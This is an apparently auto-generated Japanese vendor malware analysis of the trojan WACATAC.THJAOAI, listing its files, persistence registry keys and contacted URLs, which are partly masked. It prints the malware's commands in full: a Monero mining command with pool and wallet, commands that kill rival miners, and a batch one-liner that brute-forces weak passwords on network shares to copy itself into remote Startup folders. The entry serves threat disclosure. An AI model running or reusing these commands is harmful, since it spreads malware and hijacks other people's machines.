Trojan.Win32.WACATAC.THJAOAI

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

• %System%\cmd.exe /c taskkill /f /im lsm.exe
• %User Temp%\buff2.exe -pBuff2jre_set7z
• %User Temp%\VID.exe -pJavajre_set7z
• %User Temp%\dhelper.exe -pJavajre_set7z
• %Application Data%\TempoRX\VID001.exe
• %User Temp%\javarx.exe -pJavajre_set7z
• %User Temp%\javarx2.exe -pJavajre_set8z
• %System%\cmd.exe /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
• %System%\cmd.exe /c taskkill /f /im uihost* & taskkill /f /im DOC0*
• %Application Data%\TempoRX\uihost64.exe -o stratum+tcp://xmr-eu2.nanopool.org:14444 -t 1 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQmnsNdEu3QQ65VMUMp.RX --donate-level=1 --coin monero -p x
• %System%\cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\=!& set l=!s:-PC=!& set l=!l:-\xc3\x8f\xc3\x8a=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \!s!^|find /i " "`) do echo f|xcopy /y /d "%Application Data%\TempoRX\VID001.exe" "\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin \xc3\xa0\xc3\xa4\xc3\xac\xc3\xa8\xc3\xad\xc3\xa8\xc3\xb1\xc3\xb2\xc3\xb0\xc3\xa0\xc3\xb2\xc3\xae\xc3\xb0) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\!s!\C$ \!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "%Application Data%\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
• %User Temp%\Javatemp\jar2.exe
• cmd /C copy /b %temp%\Javatemp\ini.jwd %Application Data%\cppredistx86.exe
• cmd /C copy /b %temp%\Javatemp\jare.7z1 + %temp%\Javatemp\temps.7z1 %Application Data%\dhelper.exe
• cmd /C taskkill /f /im dhelper.exe & start %Application Data%\dhelper.exe
• taskkill /f /im dhelper.exe
• %Application Data%\dhelper.exe %Application Data%\dhelper.exe
• taskkill /f /im NsCpuCNMiner*
• taskkill /f /im IMG0*
• taskkill /f /im uihost*
• taskkill /f /im DOC0*
• %System%\cmd.exe /c net view|find /i "\" || arp -a|find /i " 1"
• %System%\cmd.exe /c set str_
• net view
• find /i "\"

(註：%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。)

マルウェアは、以下のフォルダを作成します。

• V:\
• Q:\
• I:\
• %Application Data%\TempoRX
• L:\
• G:\
• R:\
• U:\
• %User Profile%\AppData
• E:\
• X:\
• S:\
• J:\
• W:\
• Z:\
• T:\
• P:\
• H:\
• O:\
• K:\
• %All Users Profile%\{89263152-8926-8926-892631529674}
• Y:\
• N:\
• %User Temp%\Javatemp
• M:\
• %System Root%\Users

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %User Profile%フォルダは、現在ログオンしているユーザのプロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞" です。. %All Users Profile%フォルダは、ユーザの共通プロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\All Users” です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData” です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)

自動実行方法

マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
(Default) = ""

マルウェアは、Windows起動時に自動実行されるよう＜User Startup＞フォルダ内に以下のファイルを作成します。

• %User Startup%\explorer.lnk

(註：%User Startup%フォルダは、現在ログオンしているユーザのスタートアップフォルダです。Windows 98およびMEの場合、通常 "C:\Windows\Profiles\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows NTの場合、通常 "C:\WINNT\Profiles\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows 2003(32-bit)、XP、2000(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows Vista、7、8、 8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" です。)

他のシステム変更

マルウェアは、以下のフォルダを削除します。

• %User Temp%\nsz231B.tmp
• %User Temp%\nso60C5.tmp

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。)

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Run
(Default) = ""

HKEY_CURRENT_USER\Software\Microsoft\
Windows NT\CurrentVersion\Winlogon
Shell = "explorer.exe, %Application Data%\dhelper.exe"

作成活動

マルウェアは、以下のファイルを作成します。

• %Application Data%\TempoRX\uihost32.exe
• %User Temp%\Javatemp\jar2.exe
• %User Temp%\dhelper.exe
• %User Temp%\buff2.exe
• %User Temp%\Javatemp\jare.7z1
• F:
• %Application Data%\cppredistx86.exe
• %User Temp%\VID.exe
• %Application Data%\dhelper.exe
• %User Temp%\javarx2.exe
• %Application Data%\TempoRX\VID001.exe
• F:\VID001.exe
• %System Root%\VID001.exe
• %User Temp%\Javatemp\ini.jwd
• %Application Data%\TempoRX\uihost64.exe
• %All Users Profile%\{89263152-8926-8926-892631529674}\lsm.exe
• %User Temp%\Javatemp\temps.7z1
• %User Temp%\javarx.exe

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.. %All Users Profile%フォルダは、ユーザの共通プロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\All Users” です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData” です。)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

• http://{BLOCKED}.135.28:280/buff2.dat
• http://{BLOCKED}.135.28:280/VID.dat
• http://{BLOCKED}o.co/1Lan77
• http://{BLOCKED}.135.28:280/dhelper.dat
• http://{BLOCKED}s.ru/javarx.dat
• http://{BLOCKED}p.ru/javarx2.dat
• http://{BLOCKED}s.ru/tessrx.html
• http://{BLOCKED}7fce.pw/index.php?{random characters}
• http://{BLOCKED}6319.pw/index.php?{random characters}
• http://{BLOCKED}er.org
• http://{BLOCKED}d.pw
• http://xmr-eu2.{BLOCKED}ol.org
• http://{BLOCKED}16f1.pw
• http://{BLOCKED}6a07.pw
• http://{BLOCKED}e905.pw

このウイルス情報は、自動解析システムにより作成されました。